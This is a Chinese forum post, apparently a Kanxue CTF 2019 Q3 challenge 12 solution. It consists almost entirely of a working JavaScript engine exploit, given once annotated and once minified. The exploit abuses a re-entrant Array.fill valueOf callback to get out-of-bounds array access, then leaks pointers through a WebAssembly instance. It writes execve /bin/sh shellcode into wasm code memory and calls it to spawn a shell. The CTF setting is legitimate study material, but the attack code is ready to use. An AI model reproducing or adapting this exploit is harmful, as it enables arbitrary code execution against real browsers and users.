
[原创] 看雪 ctf q3 第十二题:精忠报国

2019-9-12 04:55 240

[原创] 看雪 ctf q3 第十二题:精忠报国

aqs
5
2019-9-12 04:55
240

膜2019师傅

 

也不知道自己的思路对不对,反正就是 getshell 了……等 writeup。

 

没有什么时间,先贴下代码,以后会加上分析的(嗯,会加上的)。

// One 16-byte scratch buffer with two overlapping views. f2i/i2f below write
// through one view and read through the other, which is how they reinterpret
// the raw bits of a double as a 64-bit integer and back.
var buf = new ArrayBuffer(16);
var bigUint64 = new BigUint64Array(buf);
var float64 = new Float64Array(buf);

// Reinterpret the bits of a double as an unsigned 64-bit BigInt.
// Relies on the shared `buf` views declared above: the store into float64[0]
// and the load from bigUint64[0] touch the same eight bytes, so no numeric
// conversion takes place. Not reentrant — it clobbers the shared scratch slot.
function f2i(f) {
    float64[0] = f;
    const bits = bigUint64[0];
    return bits;
}
// Inverse of f2i: store a 64-bit BigInt into the shared scratch buffer and read
// the same eight bytes back as a double. `i` must be a BigInt (a Number would
// throw on assignment to a BigUint64Array element).
function i2f(i) {
    bigUint64[0] = i;
    const asDouble = float64[0];
    return asDouble;
}
// Format a Number or BigInt as at least 16 lower-case hex digits, zero-padded
// on the left (longer values are not truncated). Debugging helper; nothing in
// the script below calls it.
function hex(i) {
    const digits = i.toString(16);
    return digits.padStart(16, "0");
}

// Minimal WebAssembly module, hand-assembled as raw bytes: it exports a linear
// memory ("memory") and one function "main" whose entire body is
// `i32.const 42; end` (the trailing 65,42,11).
var wasmCode = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]);
var wasmModule = new WebAssembly.Module(wasmCode);
var wasmInstance = new WebAssembly.Instance(wasmModule, {});
// The exported function object: it is stored into arrays in the fill() callback
// below, its memory is walked in the leak sequence, and it is called last.
var f = wasmInstance.exports.main;
// Three 64-bit words stored 8 bytes apart starting at wasmleak+0x231n further
// down. Kept as opaque constants here; the page does not document their contents.
var shellcode = [
    0x2fbb485299583b6an,
    0x5368732f6e69622fn,
    0x050f5e5457525f54n
];

// a, b and c are assigned without any declaration (implicit globals), as are the
// *leak variables further down. This only works in sloppy-mode script code; under
// 'use strict' or as an ES module every one of these assignments would throw.
a=[1.1,2.2,3.3];
b=[];
c=[];

// Grow a well past its three initialised elements.
a.length=0x100;

// The `end` argument is an object: fill() calls its valueOf() while converting the
// index, and that callback re-enters the array — it shrinks a to length 2, refills
// it with the wasm function object, and allocates the fresh arrays c and b — before
// returning 15 as the end index.
// NOTE(review): everything after this point reads c past its three initialised
// elements and treats b[0] as raw bits; it relies on whatever heap layout this
// re-entrancy leaves behind in the challenge's engine build, which cannot be
// checked from the listing alone.
a.fill(1.1,14,{valueOf(){
    a.length=0x2;
    a.fill(f);
    c=[1.1,2.2,3.2];
    b=[f];
    return 15;
}});

// Out-of-bounds reads on c (only indices 0..2 were initialised). The names record
// what the author takes these slots to hold: a map-like value at c[3], and at c[9]
// a tagged pointer whose low bit is stripped with -1n.
// NOTE(review): neither assumption can be verified from this listing.
doublemap = c[3];
wasm_base = f2i(c[9])-1n;

// Helper used by every step of the leak/overwrite sequence below. Both stores land
// past c's three initialised elements; c[10] is reset to the value captured as
// doublemap and c[12] receives addr reinterpreted as a double.
// NOTE(review): what memory these two slots alias depends on the layout set up by
// the fill() callback above and cannot be checked here. Every call is followed by
// an access to b[0], which suggests the author is redirecting where b's element
// storage is read from — an inference from usage, not from anything visible.
function element_to(addr){
    c[10]=doublemap;
    c[12]=i2f(addr);
}
// leak wasm base
// Four hops of the same pattern: point element_to() at an address, then read b[0]
// and reinterpret its bits with f2i. Each result feeds the next address.
// NOTE(review): the fixed offsets (+8n+1n, -8n, +0x70n and +0x231n below) are
// presumably tied to the specific engine build used by the challenge; they are not
// derivable from this listing. shareleak/dataleak/instanceleak/wasmleak are
// implicit globals, like a/b/c above.
element_to(wasm_base+8n+1n);
shareleak = f2i(b[0]);

element_to(shareleak-8n);
dataleak = f2i(b[0]);

element_to(dataleak);
instanceleak = f2i(b[0]);

element_to(instanceleak+0x70n);
wasmleak = f2i(b[0]);

// overwrite to shellcode
// The same primitive in the write direction: three consecutive 8-byte stores of
// the payload words declared above, each via b[0], and then the exported wasm
// function is called.
element_to(wasmleak+0x231n);
b[0]=i2f(shellcode[0]);

element_to(wasmleak+0x231n+0x8n);
b[0]=i2f(shellcode[1]);

element_to(wasmleak+0x231n+0x10n);
b[0]=i2f(shellcode[2]);
f();

压缩网站 https://www.html.cn/tool/ysjs/

 

压缩后

// Minified copy of the listing above, produced with the online compressor linked
// in the post: the same statements in the same order, collapsed onto one line.
// Left verbatim; see the formatted version for the per-step comments.
var buf=new ArrayBuffer(16);var float64=new Float64Array(buf);var bigUint64=new BigUint64Array(buf);function f2i(f){float64[0]=f;return bigUint64[0];}function i2f(i){bigUint64[0]=i;return float64[0];}function hex(i){return i.toString(16).padStart(16,"0");}var wasmCode=new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]);var wasmModule=new WebAssembly.Module(wasmCode);var wasmInstance=new WebAssembly.Instance(wasmModule,{});var f=wasmInstance.exports.main;var shellcode=[0x2fbb485299583b6an,0x5368732f6e69622fn,0x050f5e5457525f54n];a=[1.1,2.2,3.3];b=[];c=[];a.length=0x100;a.fill(1.1,14,{valueOf(){a.length=0x2;a.fill(f);c=[1.1,2.2,3.2];b=[f];return 15;}});doublemap=c[3];wasm_base=f2i(c[9])-1n;function element_to(addr){c[10]=doublemap;c[12]=i2f(addr);}element_to(wasm_base+8n+1n);shareleak=f2i(b[0]);element_to(shareleak-8n);dataleak=f2i(b[0]);element_to(dataleak);instanceleak=f2i(b[0]);element_to(instanceleak+0x70n);wasmleak=f2i(b[0]);element_to(wasmleak+0x231n);b[0]=i2f(shellcode[0]);element_to(wasmleak+0x231n+0x8n);b[0]=i2f(shellcode[1]);element_to(wasmleak+0x231n+0x10n);b[0]=i2f(shellcode[2]);f();


